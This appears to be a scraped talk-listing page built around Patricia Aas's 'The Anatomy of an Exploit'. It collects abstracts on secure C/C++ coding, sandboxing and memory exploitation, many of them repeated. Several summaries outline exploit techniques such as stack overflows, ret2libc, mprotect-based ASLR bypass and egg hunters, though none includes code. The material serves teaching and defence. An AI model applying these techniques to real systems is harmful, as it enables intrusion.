This document provides an overview of an exploit development process. It begins by discussing how exploits program the "weird machine" of vulnerable programs through memory manipulation. It then walks through developing a stack buffer overflow exploit against a vulnerable C program. Various compiler protections like stack canaries and ASLR are bypassed. The document generates a pattern to find the offset and writes an exploit program to automate writing an exploit string to trigger the vulnerability and redirect execution.
Security vulnerabilities and secure coding is often talked about in the abstract by programmers, but rarely understood. In this talk we will walk through a simple exploit, how it’s developed and how it’s used. The goal is to try to get a feeling for the point of view of an "attacker", and to slowly start looking at exploitation as another programming tool. We will mainly be looking at C and x86_64 assembly, so bring snacks.
Security vulnerabilities and secure coding is often talked about in the abstract by programmers, but rarely understood. In this talk we will walk through simple exploit attempts, and finally a simple stack buffer overflow exploit, how it’s developed and how it’s used. The goal is to try to get a feeling for the point of view of an "attacker", and to slowly start looking at exploitation as just another programming practice. We will mainly be looking at C and x86_64 assembly, so bring snacks.
Software Vulnerabilities in C and C++ (CppCon 2018)Patricia Aas
What does a vulnerability using signed integer overflow look like? Or a stack buffer overflow? How does code like this look and how can we change the way we program to reduce our risk? The first half of this talk will show examples of many different vulnerabilities and describe how these are combined to make the first steps of an exploit. Then we will discuss what kind of programming practices we can employ to reduce the chances of these kinds of bugs creeping into our code.
Thoughts On Learning A New Programming LanguagePatricia Aas
How should we teach a new language to folks that already know how to program?
How do we use what we already know to leapfrog the learning process?
Based on my personal experience and snippets of natural language theory, we will try to explore the cheats and pitfalls when learning a new programming language, but also dig into how we can make it easier.
The Anatomy of an Exploit (NDC TechTown 2019))Patricia Aas
Security vulnerabilities and secure coding is often talked about in the abstract by programmers, but rarely understood. In this talk we will walk through simple exploit attempts, and finally a simple stack buffer overflow exploit, how it’s developed and how it’s used.
The goal is to try to get a feeling for the point of view of an "attacker", and to slowly start looking at exploitation as just another programming practice. We will mainly be looking at C and x86_64 assembly, so bring snacks.
Secure Programming Practices in C++ (NDC Oslo 2018)Patricia Aas
Bjarne Stroustrup, the creator of C++, once said : “C makes it easy to shoot yourself in the foot; C++ makes it harder, but when you do it blows your whole leg off.” He has also said : “Within C++, there is a much smaller and cleaner language struggling to get out.” Both are true.
This talk is for programmers wishing to feel more comfortable navigating the C++ landscape. Motivated by going through well known vulnerability patterns that have been used in exploits for decades, we will explore the programming culture that has developed around the C++ language. Specifically, we will look at programming patterns that navigate around or through some of the dangerous parts of the C++ language. The goal is to build a set of programming practices based in the “smaller and cleaner language” inside C++. And by doing so, we will also build an awareness around code constructs that can potentially “blow your whole leg off”.
Undefined Behavior and Compiler Optimizations can result in programs that display surprising behavior. In this presentation we look at some examples, and I hope to convince you that you should not reason about Undefined Behavior and that you should take care and use your tools.
Secure Programming Practices in C++ (NDC Security 2018)Patricia Aas
This talk is for programmers wishing to feel more comfortable navigating the C++ landscape. We will explore the programming culture that has developed around the C++ language. Specifically, we will look at programming patterns that navigate around or through some of the dangerous parts of the C++ language. The goal is to build a set of programming practices based in the “smaller and cleaner language” inside C++. And by doing so, we will also build an awareness around code constructs that can potentially “blows your whole leg off”.
Security vulnerabilities and secure coding is often talked about in the abstract by programmers, but rarely understood. In this talk we will walk through a simple exploit, how it’s developed and how it’s used. The goal is to try to get a feeling for the point of view of an "attacker", and to slowly start looking at exploitation as another programming tool. We will mainly be looking at C and x86_64 assembly, so bring snacks.
Security vulnerabilities and secure coding is often talked about in the abstract by programmers, but rarely understood. In this talk we will walk through simple exploit attempts, and finally a simple stack buffer overflow exploit, how it’s developed and how it’s used. The goal is to try to get a feeling for the point of view of an "attacker", and to slowly start looking at exploitation as just another programming practice. We will mainly be looking at C and x86_64 assembly, so bring snacks.
Software Vulnerabilities in C and C++ (CppCon 2018)Patricia Aas
What does a vulnerability using signed integer overflow look like? Or a stack buffer overflow? How does code like this look and how can we change the way we program to reduce our risk? The first half of this talk will show examples of many different vulnerabilities and describe how these are combined to make the first steps of an exploit. Then we will discuss what kind of programming practices we can employ to reduce the chances of these kinds of bugs creeping into our code.
Thoughts On Learning A New Programming LanguagePatricia Aas
How should we teach a new language to folks that already know how to program?
How do we use what we already know to leapfrog the learning process?
Based on my personal experience and snippets of natural language theory, we will try to explore the cheats and pitfalls when learning a new programming language, but also dig into how we can make it easier.
The Anatomy of an Exploit (NDC TechTown 2019))Patricia Aas
Security vulnerabilities and secure coding is often talked about in the abstract by programmers, but rarely understood. In this talk we will walk through simple exploit attempts, and finally a simple stack buffer overflow exploit, how it’s developed and how it’s used.
The goal is to try to get a feeling for the point of view of an "attacker", and to slowly start looking at exploitation as just another programming practice. We will mainly be looking at C and x86_64 assembly, so bring snacks.
Secure Programming Practices in C++ (NDC Oslo 2018)Patricia Aas
Bjarne Stroustrup, the creator of C++, once said : “C makes it easy to shoot yourself in the foot; C++ makes it harder, but when you do it blows your whole leg off.” He has also said : “Within C++, there is a much smaller and cleaner language struggling to get out.” Both are true.
This talk is for programmers wishing to feel more comfortable navigating the C++ landscape. Motivated by going through well known vulnerability patterns that have been used in exploits for decades, we will explore the programming culture that has developed around the C++ language. Specifically, we will look at programming patterns that navigate around or through some of the dangerous parts of the C++ language. The goal is to build a set of programming practices based in the “smaller and cleaner language” inside C++. And by doing so, we will also build an awareness around code constructs that can potentially “blow your whole leg off”.
Undefined Behavior and Compiler Optimizations can result in programs that display surprising behavior. In this presentation we look at some examples, and I hope to convince you that you should not reason about Undefined Behavior and that you should take care and use your tools.
Secure Programming Practices in C++ (NDC Security 2018)Patricia Aas
This talk is for programmers wishing to feel more comfortable navigating the C++ landscape. We will explore the programming culture that has developed around the C++ language. Specifically, we will look at programming patterns that navigate around or through some of the dangerous parts of the C++ language. The goal is to build a set of programming practices based in the “smaller and cleaner language” inside C++. And by doing so, we will also build an awareness around code constructs that can potentially “blows your whole leg off”.
Chromium Sandbox on Linux (NDC Security 2019)Patricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers.
However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context in this talk.
The document discusses various programming language concepts and how they are implemented in C# compared to other languages like C++. It provides code examples of concepts like namespaces, operator overloading, optional arguments, structs, properties, and delegates in C# and compares them to their implementation in C++ or other languages. It emphasizes finding the similarities between languages but also pointing out differences or potential "false friends" where the implementation or semantics have drifted from the original.
Reading Other Peoples Code (Web Rebels 2018)Patricia Aas
Someone else's code. Even worse, thousands of lines, maybe hundreds of files of other peoples code. Is there a way to methodically read and understand other peoples work, build their mental models? In this talk I will go through techniques I have developed throughout 18 years of programming. Hopefully you will walk away with a plan on how to approach a new code base. But even more I hope you walk away with a feeling of curiosity, wanting to get to know your fellow programmers through their code.
The document discusses system hacking and reverse engineering techniques. It introduces egg hunting, which searches a process's memory to locate and execute injected shellcode when only a small buffer is available for exploitation. Egg hunting code consists of an egg hunter, marker, and shellcode. The egg hunter searches for the marker and jumps to it, then the shellcode executes. Various exploitation techniques are covered for Windows, Unix-like systems and ARM.
Isolating GPU Access in its Own ProcessPatricia Aas
Chromium's process architecture has graphics access restricted to a separate GPU-process. There are several reasons why this could make sense, three common ones are: Security, Robustness and Dependency Separation.
GPU access restricted to a single process requires an efficient framework for communication over IPC from the other processes, and most likely a framework for composition of surfaces. This talk describes both the possible motivations for this kind of architecture and Chromium's solution for the IPC framework. We will demonstrate how a multi-process program can compose into a single window on Linux.
Exploit Research and Development Megaprimer: Win32 EgghunterAjin Abraham
Exploit Research and Development Megaprimer
http://opensecurity.in/exploit-research-and-development-megaprimer/
http://www.youtube.com/playlist?list=PLX3EwmWe0cS_5oy86fnqFRfHpxJHjtuyf
Chromium Sandbox on Linux (BlackHoodie 2018)Patricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers. However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context in this talk.
Introduction to Memory Exploitation (CppEurope 2021)Patricia Aas
Stack based exploitation has gotten all the fame, but many platform and compiler mitigations have made it very hard to exploit stack vulnerabilities. Heap based exploits are still very relevant, and since this is black magic for most developers I will here give an introduction to the field.
This document discusses Cisco IOS shellcoding and reverse engineering. It covers topics like Cisco IOS shellcodes that are image-independent by disassembling or interrupting hijacking. It also discusses Tcl shellcodes, Cisco IOS reverse engineering challenges including lack of modularity and APIs. The document details subsystems, registries, processes, command parser tree, debugging Cisco IOS, and magic numbers used in Cisco IOS.
The document discusses how to publish a Perl 6 module. It covers creating modules, writing tests, documenting metadata, installing modules locally or via package managers like panda, and releasing modules to the ecosystem. Key steps include writing Perl 6 code and tests, adding metadata, testing the metadata, pushing to GitHub, and publishing releases to the ecosystem.
DEF CON 23 - COLIN O'FLYNN - dont whisper my chipsFelipe Prado
This document summarizes a presentation given by Colin O'Flynn at DEFCON 2015 about physical layer attacks. The objective of the presentation was to teach about various physical layer attacks and show that the tools used are open source and freely available. Many of the hardware tools are commercially available but can also be homemade. The presentation covered topics like side-channel analysis, fault injection, and cryptography attacks on embedded devices and discussed tools like the ChipWhisperer for performing analyses. Code and documentation for the tools are available on the listed websites.
Linux Security APIs and the Chromium SandboxPatricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers. However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context.
The Chromium Sandbox is used in the Vivaldi, Brave, Chrome and Opera browsers among others. It has a very platform specific implementation, using the platform APIs available to construct it. In this talk we will describe the requirements of the Chromium Sandbox and go through the steps and APIs used to construct it on Linux.
The document provides an overview of basic penetration testing techniques including buffer overflow vulnerabilities, return oriented programming (ROP), format string vulnerabilities, and ways to bypass data execution prevention (DEP) and address space layout randomization (ASLR). It discusses stack-based buffer overflows, the structure of the x86 stack, overwriting the return address, and controlling the instruction pointer. It also covers ROP techniques like ret2libc, gadgets, chaining, and using libc functions. Finally, it briefly mentions tools like pwntools, ROPgadget, and techniques like IO wrapping and LD_PRELOAD hijacking.
Better detection of what modules are used by some Perl 5 codecharsbar
This document discusses Perl::PrereqScanner::NotQuiteLite, a module that detects which modules are used by Perl 5 code in a more accurate way than existing tools. It summarizes that Perl::PrereqScanner::NotQuiteLite can detect module requirements across a wide range of frameworks and syntax, including Moose, Catalyst, and Test::More. It also migrates the detection of module requirements from Perl::PrereqScanner to Perl::PrereqScanner::NotQuiteLite and describes how to update CPAN files and test them based on the module usage detected.
The document contains multiple choice questions about PHP. It tests knowledge of concepts like sessions, arrays, streams, static methods, and security best practices. Key topics covered include the Observer pattern, auto-incrementing keys, extracting arrays, sorting arrays by value, stream metadata, blocking streams, and array intersection.
C++ for Java Developers (JavaZone 2017)Patricia Aas
The document is a presentation on C++ for Java developers. It introduces C++ concepts like classes, references, pointers, memory management and standard libraries. It emphasizes using modern C++ features like the stack instead of heap for memory, values instead of pointers, and standard libraries. It summarizes that developers should use modern C++ practices like values, references, const, and libraries, but most importantly not use raw pointers like "Banana * b = new Banana();".
This document discusses bypassing address space layout randomization (ASLR) protections to execute shellcode on the stack. It begins with an overview of stack-based buffer overflows and modern protections like non-executable stacks. It then describes using return-oriented programming (ROP) techniques like ret2libc to hijack control flow and call library functions like system() to spawn a shell. Specifically, it outlines overwriting a return address to call mprotect() to make the stack executable, then jumping to shellcode on the stack. The document provides example exploit code and steps to find needed addresses in memory.
The document discusses bypassing address space layout randomization (ASLR) on Linux. It begins with a refresher on buffer overflows and modern protections like ASLR and DEP. It then explores finding fixed addresses in the .text section that are not subject to ASLR to redirect execution, such as calls and jumps to registers. The document shows searching binaries for these instruction sequences and checking register values to leverage them for exploiting a vulnerable program while ASLR is enabled.
Introduction to Memory Exploitation (Meeting C++ 2021)Patricia Aas
Stack based exploitation has gotten all the fame, but many platform and compiler mitigations have made it very hard to exploit stack vulnerabilities. Heap based exploits are still very relevant, and since this is black magic for most developers I will here give an introduction to the field.
We keep on thinking we are living in the future, but native exploitation has a rich history, and many times the vulnerabilities and exploitation techniques are decades old. We'll look at some of these, how they have surfaced in recent years and how prepared we are today, armed with modern tooling, to find and fix "classic" vulnerabilities.
Chromium Sandbox on Linux (NDC Security 2019)Patricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers.
However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context in this talk.
The document discusses various programming language concepts and how they are implemented in C# compared to other languages like C++. It provides code examples of concepts like namespaces, operator overloading, optional arguments, structs, properties, and delegates in C# and compares them to their implementation in C++ or other languages. It emphasizes finding the similarities between languages but also pointing out differences or potential "false friends" where the implementation or semantics have drifted from the original.
Reading Other Peoples Code (Web Rebels 2018)Patricia Aas
Someone else's code. Even worse, thousands of lines, maybe hundreds of files of other peoples code. Is there a way to methodically read and understand other peoples work, build their mental models? In this talk I will go through techniques I have developed throughout 18 years of programming. Hopefully you will walk away with a plan on how to approach a new code base. But even more I hope you walk away with a feeling of curiosity, wanting to get to know your fellow programmers through their code.
The document discusses system hacking and reverse engineering techniques. It introduces egg hunting, which searches a process's memory to locate and execute injected shellcode when only a small buffer is available for exploitation. Egg hunting code consists of an egg hunter, marker, and shellcode. The egg hunter searches for the marker and jumps to it, then the shellcode executes. Various exploitation techniques are covered for Windows, Unix-like systems and ARM.
Isolating GPU Access in its Own ProcessPatricia Aas
Chromium's process architecture has graphics access restricted to a separate GPU-process. There are several reasons why this could make sense, three common ones are: Security, Robustness and Dependency Separation.
GPU access restricted to a single process requires an efficient framework for communication over IPC from the other processes, and most likely a framework for composition of surfaces. This talk describes both the possible motivations for this kind of architecture and Chromium's solution for the IPC framework. We will demonstrate how a multi-process program can compose into a single window on Linux.
Exploit Research and Development Megaprimer: Win32 EgghunterAjin Abraham
Exploit Research and Development Megaprimer
http://opensecurity.in/exploit-research-and-development-megaprimer/
http://www.youtube.com/playlist?list=PLX3EwmWe0cS_5oy86fnqFRfHpxJHjtuyf
Chromium Sandbox on Linux (BlackHoodie 2018)Patricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers. However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context in this talk.
Introduction to Memory Exploitation (CppEurope 2021)Patricia Aas
Stack based exploitation has gotten all the fame, but many platform and compiler mitigations have made it very hard to exploit stack vulnerabilities. Heap based exploits are still very relevant, and since this is black magic for most developers I will here give an introduction to the field.
This document discusses Cisco IOS shellcoding and reverse engineering. It covers topics like Cisco IOS shellcodes that are image-independent by disassembling or interrupting hijacking. It also discusses Tcl shellcodes, Cisco IOS reverse engineering challenges including lack of modularity and APIs. The document details subsystems, registries, processes, command parser tree, debugging Cisco IOS, and magic numbers used in Cisco IOS.
The document discusses how to publish a Perl 6 module. It covers creating modules, writing tests, documenting metadata, installing modules locally or via package managers like panda, and releasing modules to the ecosystem. Key steps include writing Perl 6 code and tests, adding metadata, testing the metadata, pushing to GitHub, and publishing releases to the ecosystem.
DEF CON 23 - COLIN O'FLYNN - dont whisper my chipsFelipe Prado
This document summarizes a presentation given by Colin O'Flynn at DEFCON 2015 about physical layer attacks. The objective of the presentation was to teach about various physical layer attacks and show that the tools used are open source and freely available. Many of the hardware tools are commercially available but can also be homemade. The presentation covered topics like side-channel analysis, fault injection, and cryptography attacks on embedded devices and discussed tools like the ChipWhisperer for performing analyses. Code and documentation for the tools are available on the listed websites.
Linux Security APIs and the Chromium SandboxPatricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers. However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context.
The Chromium Sandbox is used in the Vivaldi, Brave, Chrome and Opera browsers among others. It has a very platform specific implementation, using the platform APIs available to construct it. In this talk we will describe the requirements of the Chromium Sandbox and go through the steps and APIs used to construct it on Linux.
The document provides an overview of basic penetration testing techniques including buffer overflow vulnerabilities, return oriented programming (ROP), format string vulnerabilities, and ways to bypass data execution prevention (DEP) and address space layout randomization (ASLR). It discusses stack-based buffer overflows, the structure of the x86 stack, overwriting the return address, and controlling the instruction pointer. It also covers ROP techniques like ret2libc, gadgets, chaining, and using libc functions. Finally, it briefly mentions tools like pwntools, ROPgadget, and techniques like IO wrapping and LD_PRELOAD hijacking.
Better detection of what modules are used by some Perl 5 codecharsbar
This document discusses Perl::PrereqScanner::NotQuiteLite, a module that detects which modules are used by Perl 5 code in a more accurate way than existing tools. It summarizes that Perl::PrereqScanner::NotQuiteLite can detect module requirements across a wide range of frameworks and syntax, including Moose, Catalyst, and Test::More. It also migrates the detection of module requirements from Perl::PrereqScanner to Perl::PrereqScanner::NotQuiteLite and describes how to update CPAN files and test them based on the module usage detected.
The document contains multiple choice questions about PHP. It tests knowledge of concepts like sessions, arrays, streams, static methods, and security best practices. Key topics covered include the Observer pattern, auto-incrementing keys, extracting arrays, sorting arrays by value, stream metadata, blocking streams, and array intersection.
C++ for Java Developers (JavaZone 2017)Patricia Aas
The document is a presentation on C++ for Java developers. It introduces C++ concepts like classes, references, pointers, memory management and standard libraries. It emphasizes using modern C++ features like the stack instead of heap for memory, values instead of pointers, and standard libraries. It summarizes that developers should use modern C++ practices like values, references, const, and libraries, but most importantly not use raw pointers like "Banana * b = new Banana();".
This document discusses bypassing address space layout randomization (ASLR) protections to execute shellcode on the stack. It begins with an overview of stack-based buffer overflows and modern protections like non-executable stacks. It then describes using return-oriented programming (ROP) techniques like ret2libc to hijack control flow and call library functions like system() to spawn a shell. Specifically, it outlines overwriting a return address to call mprotect() to make the stack executable, then jumping to shellcode on the stack. The document provides example exploit code and steps to find needed addresses in memory.
The document discusses bypassing address space layout randomization (ASLR) on Linux. It begins with a refresher on buffer overflows and modern protections like ASLR and DEP. It then explores finding fixed addresses in the .text section that are not subject to ASLR to redirect execution, such as calls and jumps to registers. The document shows searching binaries for these instruction sequences and checking register values to leverage them for exploiting a vulnerable program while ASLR is enabled.
Introduction to Memory Exploitation (Meeting C++ 2021)Patricia Aas
Stack based exploitation has gotten all the fame, but many platform and compiler mitigations have made it very hard to exploit stack vulnerabilities. Heap based exploits are still very relevant, and since this is black magic for most developers I will here give an introduction to the field.
We keep on thinking we are living in the future, but native exploitation has a rich history, and many times the vulnerabilities and exploitation techniques are decades old. We'll look at some of these, how they have surfaced in recent years and how prepared we are today, armed with modern tooling, to find and fix "classic" vulnerabilities.
We keep on thinking we are living in the future, but native exploitation has a rich history, and many times the vulnerabilities and exploitation techniques are decades old.
We'll look at some of these, how they have surfaced in recent years and how prepared we are today, armed with modern tooling, to find and fix "classic" vulnerabilities.
There is hardly a Senior Java developer who has never heard of sun.misc.Unsafe. Though it has always been a private API intended for JDK internal use only, the popularity of Unsafe has grown too fast, and now it is used in many open-source projects. OK.RU is not an exception: its software also heavily relies on Unsafe APIs.
During this session we'll try to understand what is so attractive about Unsafe. Why do people keep using it regardless the warnings of removal from future JDK releases? Are there any safe alternatives to private API or is it absolutely vital? We will review the typical cases when Java developers prefer to go unsafe and discuss major benefits and the drawbacks of it. The report will be supported by the real examples from OK.RU experience.
L'app Square Register Android ne crashe pas. Enfin... presque pas!
La recette magique? Combiner une approche aggressive avec la remontée de métadonnées et un monitoring précis. Venez découvrir les outils et techniques qui nous permettent de développer une app gérant des paiements sans mourir de trouille!
http://www.mix-it.fr/session/3532/
Vagrant is a well-known tool for creating development environments in a simple and consistent way. Since we adopted in our organization we experienced several benefits: lower project setup times, better shared knowledge among team members, less wtf moments ;-)
In this session we’d like to share our experience, including but not limited to:advanced vagrantfile configurationvm configuration tips for dev environment: performance,
debug, tuning,
our wtf moments
puphet/phansilbe: hot or not?
packaging a box
This document discusses the use of deterministic simulation to test distributed systems. It describes how Flow, a programming language extension to C++, can be used to simulate concurrency and external communications deterministically. This allows debugging a simulation instead of the live distributed system. Key aspects of the simulation include single-threaded pseudo-concurrency, simulating external connections and files, and ensuring all control flow is deterministic based only on inputs. The simulator is used to run tests and simulated disasters to uncover bugs in a more efficient manner than real world testing alone.
seccomp is a computer security facility in the Linux kernel, pledge is a similar security facility in the OpenBSD kernel. In this presentation Giovanni Bechis will review the development story and progress of both kernel interfaces and will analyze the main differences. There will be some examples of implementations of security patches made for some important open source projects.
Return Oriented Programming, an introductionPatricia Aas
Return Oriented Programming (ROP) is an exploitation technique that folks have often heard of, but don't know the mechanics of.
In this talk you will learn how it works, and we will go through how it can be used to execute code in contexts where the stack is not executable.
The document discusses code for serial port (com) device drivers in FreeBSD. It shows code from the comstart() function, which is called by the tty layer when there is outgoing data to transmit. Comstart() grabs the data from the tty queue and sets up the com_softc structure to start transmission. It then calls the chip-specific transmit function. The com_softc structure contains a pointer to the associated tty structure.
The document discusses weaknesses in random number generation and pseudorandom number generation (PRNG) that can be exploited by attackers. It provides examples of programs that used weak PRNGs, allowing session IDs and keys to be guessed. Lessons learned are that numbers used to derive keys and IDs must be truly random and unpredictable, and PRNGs must be cryptographically secure. Two types of randomness are defined: true randomness from unpredictable sources, and pseudorandomness from cryptographically secure PRNGs seeded with true randomness.
TASK #1In the domain class you will create a loop that will prompt.pdfindiaartz
TASK #1
In the domain class you will create a loop that will prompt the user to enter a value of 1, 2, or 3,
which will in turn, be translated to a floor number in the game. Make sure the user only picks a
selection you are expecting (1, 2, or 3) with a while-loop. Then you will create a switch or if-else
statement. If you are more comfortable with if-else then do switch, or if you are more
comfortable with switch then do if-else. Based on the number the user chooses you will set the
floor variable to the appropriate value. When they select 1 floor should be set to 3, when they
select 2 floor should be set to 6, and when they select 3 floor should be set to 10.
TASK #2
In the domain class you will create a constructor with 6 parameters, representing all the data
loaded from the input file that was saved from a previous adventure. This constructor receives 6
parameters: aName, anAttack, aDefense, aHealth, aCurrentFloor, & aMaxFloor.
TASK #3
In the domain class you will create a save method that will allow the user to save their progress
using a PrintWriter object. This file will overwrite whatever was there before, so no need to use
FileWriter, only PrintWriter. There are 6 attributes that you need to write to the file:
name, attack, defense, health, currentFloor, & maxFloor
public void saveFile()
{
String filename = “game.txt”;
PrintWriter pw = new PrintWriter(filename);
pw.println(name);
pw.println(attack);
pw.println(defense);
pw.println(health);
pw.println(currentFloor);
pw.println(maxFloor);
pw.close();
}
TASK #4
In the driver class you will create a load method that will allow the user to pick up from where
they left off. You will do this using a File object and a Scanner object. Remember to use the File
and Scanner classes, and to close the file object after you’re done. There are 6 attributes you will
need to load from the file to successfully continue an Adventure:
name, attack, defense, health, currentFloor, & maxFloor
After you read the record from the file, and store the data in these 6 variables, you can create a
new Adventure object called JavaQuest with those 6 variables. Remember JavaQuest is a global
variable defined at the beginning of the driver class. Then, within the load method, invoke the
startAdventure() method for the newly created Adventure object.
public static void load()
{
String filename = “load.txt”;
File myFile = new File(filename);
Scanner myScan = new Scanner(myFile);
String name;
int attack, defense, health, currentFloor, maxFloor;
name = myScan.nextLine();
attack = myScan.nextInt();
myScan.nextLine();
defense = myScan.nextInt();
myScan.nextLine();
…
javaQuest = new Adventure(name, attack, defense, health, currentFloor, maxFloor);
}
javaQuest.startAdventure();
The Files
package Adventure;
import java.io.BufferedWriter;
import java.io.File;
import java.io.IOException;
import java.io.PrintWriter;
import java.util.Random;
import java.util.Scanner;
public class Adventure
{
int health, defense, attack;
String mons.
The vulnerability allows remote code execution via a buffer overflow in the __nss_hostname_digits_dots() function of glibc versions before 2.18. The overflow occurs when this function is called by the gethostbyname*() family of functions with a specially crafted hostname argument meeting certain requirements. While serious, the impact is reduced as gethostbyname*() is obsolete, many programs add validation, and a patch was released in 2013.
Heap-based buffer overflow in the __nss_hostname_digits_dots function in glibc 2.2, and other 2.x versions before 2.18, allows context-dependent attackers to execute arbitrary code via vectors related to the (1) gethostbyname or (2) gethostbyname2 function, aka "GHOST."
The GHOST vulnerability is a serious weakness in the Linux glibc library. It allows attackers to remotely take complete control of the victim system without having any prior knowledge of system credentials. CVE-2015-0235 has been assigned to this issue.
Qualys security researchers discovered this bug and worked closely with Linux distribution vendors. And as a result of that we are releasing this advisory today as a coordinated effort, and patches for all distribution are available January 27, 2015.
Dependency Management in C++ (NDC TechTown 2021)Patricia Aas
C++ has been slow to settle on standardized tools for building and dependency management. In recent years CMake has emerged as the de facto standard for builds, but dependency management still has no clear winner. In this talk I will look into what dependency management might look like in modern C++ projects and how that relates to security.
1. The document discusses building resilient services in Go by focusing on uptime, error handling, concurrency, and monitoring services. It provides examples of handling errors, avoiding race conditions, implementing timeouts, and profiling services to understand memory usage and detect issues.
2. Key recommendations include carefully handling errors and resources using defer, avoiding race conditions using channels properly, enabling the race detector, implementing timeouts, and profiling services regularly to monitor memory usage and detect issues.
3. The document advocates knowing your service well through metrics like memory usage per request, stack traces of goroutines, and who is allocating memory in order to build resilience through monitoring, error handling, and avoiding common pitfalls.
The document describes how to port and modify drivers for UART, Ethernet, LCD, and keypad on a Mango100 board running Android. It provides instructions on configuring the kernel, modifying driver source code files, and checking that the drivers are functioning properly. Key steps include enabling drivers in the kernel .config file, adding device registration code, and modifying functions to set GPIO pins and timing parameters for devices like the LCD. It also explains how to view input events in logcat and trace the flow of key events through the Android framework.
Jasmine is a BDD framework for testing JavaScript code. It does not depend on other frameworks and does not require a DOM. Jasmine uses specs, expectations, suites, and matchers to define tests and make assertions. It also supports features for testing asynchronous code and spying on functions. Jasmine provides tools like spies, stubs, fakes, and mocks to help test code behavior.
Similar to The Anatomy of an Exploit (NDC TechTown 2019) (20)
NDC TechTown 2023_ Return Oriented Programming an introduction.pdfPatricia Aas
Return Oriented Programming (ROP) is an exploitation technique that folks have often heard of, but don't know the mechanics of. In this talk you will learn how it works, and we will go through some examples to show how it can be used to execute code in contexts where the stack is not executable.
I can't work like this (KDE Academy Keynote 2021)Patricia Aas
Making software products can be fraught with conflicts, where people in different roles may feel sabotaged by others. In this talk I present a model for thinking about the problems we solve and how we solve them, and using that I hope to convince you that team excellence comes from our differences, rather than in spite of them. Hopefully you'll walk away with a deeper understanding of that colleague that never writes tests, or the one that constantly complains that all you do is "make bugs".
Trying to build an Open Source browser in 2020Patricia Aas
A lot of things have been developed over the last 15 years that should make the process of making a browser easier. In this talk we will explore a bunch of different tools, platforms and libraries that could go into making a browser in 2020.
We will also see a live demo of a simple browser built with these OSS projects. We will also discuss the limitations and future work needed to make this work in practice.
Trying to build an Open Source browser in 2020Patricia Aas
A lot of things have been developed over the last 15 years that should make the process of making a browser easier. In this talk we will explore a bunch of different tools, platforms and libraries that could go into making a browser in 2020.
We will also see a live demo of a simple browser built with these OSS projects. We will also discuss the limitations and future work needed to make this work in practice.
DevSecOps for Developers, How To Start (ETC 2020)Patricia Aas
How can you squeeze Security into DevOps? Security is often an understaffed function, so how can you leverage what you have in DevOps to improve your security posture?
Often the culture clash between Security and Development is even more prominent than between Development and Operations. Understanding the differences in how these functions work, and leveraging their similarities, will reveal processes already in place that can be used to improve security. This fine tuning of tools and processes can give you DevSecOps on a shoestring.
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)Patricia Aas
Free and correct elections are the linchpin of democracy. For a government to be formed based the will of the people, the will of the people must be heard. Across the world election systems are being classified as critical infrastructure, and they face the same concerns as all other fundamental systems in society.
We are building our critical infrastructure from hardware and software built by nations and companies we can’t expect to trust. How can this be dealt with in Election Security, and can those lessons be applied to other critical systems society depends on today?
Elections, Trust and Critical Infrastructure (NDC TechTown)Patricia Aas
Free and correct elections are the linchpin of democracy. For a government to be formed based the will of the people, the will of the people must be heard. Across the world election systems are being classified as critical infrastructure, and they face the same concerns as all other fundamental systems in society.
We are building our critical infrastructure from hardware and software built by nations and companies we can’t expect to trust. How can this be dealt with in Election Security, and can those lessons be applied to other critical systems society depends on today?
Survival Tips for Women in Tech (JavaZone 2019) Patricia Aas
Being the only woman on your team can be hard. Many times it’s difficult to know what is only your experience and what is common. In this talk we’ll go through 24 tips (and a few bonus tips) based on well over a decade of experience being the only woman in several teams. If you’re a woman hopefully you’ll walk out with some ideas you can put to work right away, if you’re a man hopefully you’ll walk out with a new perspective and start noticing things in your day-to-day that you didn’t notice before.
https://patricia.no/2018/09/06/survival_tips_for_women_in_tech.html
Patricia Aas is a C++ programmer and security expert who currently works for TurtleSec. She is concerned about issues like election security, privacy, and the lack of oversight and regulation in the technology industry. She believes technology has introduced fragility to important systems like democracy. However, most people do not understand the implications of technological issues and journalists struggle to explain the problems to the general public. This leaves the industry unregulated and unable to have meaningful public debates around ethics and social impacts.
Keynote: Deconstructing Privilege (C++ on Sea 2019)Patricia Aas
Can you describe a situation that caused you to realize you were privileged?
I have asked many people that question now, and what I have learned is that privilege is an Unconscious Incompetence. Being privileged is a non-event. When we become conscious of it we realize that our privileged experience is not applicable to less privileged people. What happens to them does not happen to us. Only when we become Consciously Incompetent do we realize the need to listen. We need to learn.
In this talk I hope to make you realize that we all have privilege and to start a journey through self reflection to becoming Consciously Incompetent. I hope also to give some indicators and patterns that you can look for in your daily lives to recognize and maybe even to correct imbalances you see.
The document summarizes Patricia Aas' talk on making software secure and fixable. It discusses common security issues such as being unable to roll out fixes, lack of control over dependencies, teams leaving without documentation, bugs in code, and pressure from management to implement insecure features. It provides recommendations to address each issue, such as maintaining version control, auditing dependencies, bringing work back in-house, rigorous testing and reviews, and protecting developers and users. The document also covers designing security notifications and interfaces with a focus on usability over detailed technical explanations.
Why Is Election Security So Hard? (Paranoia 2019) Patricia Aas
What makes the domain and requirements of elections so difficult to solve with computers? In this talk we will go through a lot of the requirements of an election and what motivates them, and show how computers surprisingly often introduce more vulnerabilities than they solve when applied to elections.
Reading Other Peoples Code (NDC Copenhagen 2019)Patricia Aas
Someone else's code. Even worse, thousands of lines, maybe hundreds of files of other peoples code. Is there a way to methodically read and understand other peoples work, build their mental models?
In this talk I will go through techniques I have developed throughout 18 years of programming. Hopefully, you will walk away with a plan on how to approach a new code base. But even more, I hope you walk away with a feeling of curiosity, wanting to get to know your fellow programmers through their code.
